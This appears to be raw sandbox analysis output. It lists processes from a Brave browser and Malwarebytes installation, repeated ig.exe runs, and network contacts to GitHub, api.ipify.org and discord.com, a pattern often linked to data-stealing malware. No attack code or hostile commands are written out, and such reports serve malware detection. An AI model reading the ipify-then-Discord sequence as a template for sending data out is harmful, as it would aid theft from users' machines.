"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNjEuMTQ5IiBzaGVsbF92ZXJzaW9uPSIxLjMuMzYxLjE0OSIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9Ins5RDMyNkU4Qi02MTU3LTQzNEUtQUU0MS0zQkYzMEQ2RDE1MkN9IiBpbnN0YWxsc291cmNlPSJ0YWdnZWRtaSIgdGVzdHNvdXJjZT0iYXV0byIgcmVxdWVzdGlkPSJ7OTdFNUE2MTktODg4QS00MzZELUE1QTktMEMxQTFENDE2OUREfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBwaHlzbWVtb3J5PSI4IiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9IntBRkU2QTQ2Mi1DNTc0LTRCOEEtQUY0My00Q0M2MERGNDU2M0J9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMjUuMS42Ni4xMTgiIGFwPSJyZWxlYXNlIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cHM6Ly91cGRhdGVzLWNkbi5icmF2ZXNvZnR3YXJlLmNvbS9idWlsZC9CcmF2ZS1SZWxlYXNlL3JlbGVhc2Uvd2luLzEyNS4xLjY2LjExOC94NjQvYnJhdmVfaW5zdGFsbGVyLXg2NC5leGUiIGRvd25sb2FkZWQ9IjEyNTQxNjQ3MiIgdG90YWw9IjEyNTQxNjQ3MiIgZG93bmxvYWRfdGltZV9tcz0iMTIyOTQiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjQwNyIgZG93bmxvYWRfdGltZV9tcz0iMTM0NTAiIGRvd25sb2FkZWQ9IjEyNTQxNjQ3MiIgdG90YWw9IjEyNTQxNjQ3MiIgaW5zdGFsbF90aW1lX21zPSIyOTQ3NyIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateOnDemand.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateOnDemand.exe" -Embedding
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ondemand
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --from-installer
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=125.1.66.118 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffd47b32c80,0x7ffd47b32c8c,0x7ffd47b32c98
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=2008 /prefetch:2
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --field-trial-handle=2180,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2300,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=2440 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3356,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3372,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --extension-process --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=1844,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=4116 /prefetch:2
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --extension-process --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4752,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=4764 /prefetch:2
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --field-trial-handle=5236,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5300 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5224,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5464,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5540,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5556 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=125.1.66.118 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff75f0cefe0,0x7ff75f0cefec,0x7ff75f0ceff8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5468,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5496 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\BraveSoftware\Brave-Browser\Application\initial_preferences" --create-shortcuts=1 --install-level=0
C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=125.1.66.118 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff75f0cefe0,0x7ff75f0cefec,0x7ff75f0ceff8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5724,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5736 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5272,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5976 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6116,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6140 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5688,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5848,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5696 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=4912,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5116 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5080,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5556 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5968,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5528 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5720,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6436 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5972,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6312 /prefetch:1
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --start-stack-profiler --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5600,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6304 /prefetch:1
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=4384,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5356 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6280,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=5672,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6460 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=6396,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6148 /prefetch:8
C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=1272,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6168,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5160 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5168,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=784 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5980,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6264 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=4768,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5784 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6036,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6264,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5420 /prefetch:8
C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe" /installmbtun
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "9" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf" "9" "4ba9030c7" "000000000000014C" "Service-0x0-3e7$\Default" "0000000000000160" "208" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun"
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe" nowindow
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5340,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6456,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=5388 /prefetch:1
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=9617089715563437539 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=5824,i,8447889478957603871,10436863984475816224,262144 --variations-seed-version=1 --mojo-platform-channel-handle=6684 /prefetch:1
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe
"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /c
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /cr
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveCrashHandler.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveCrashHandler.exe"
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveCrashHandler64.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveCrashHandler64.exe"
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ua /installsource core
C:\Users\Admin\AppData\LocalLow\IGDump\sec\ig.exe
ig.exe secure
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /svc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 105.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
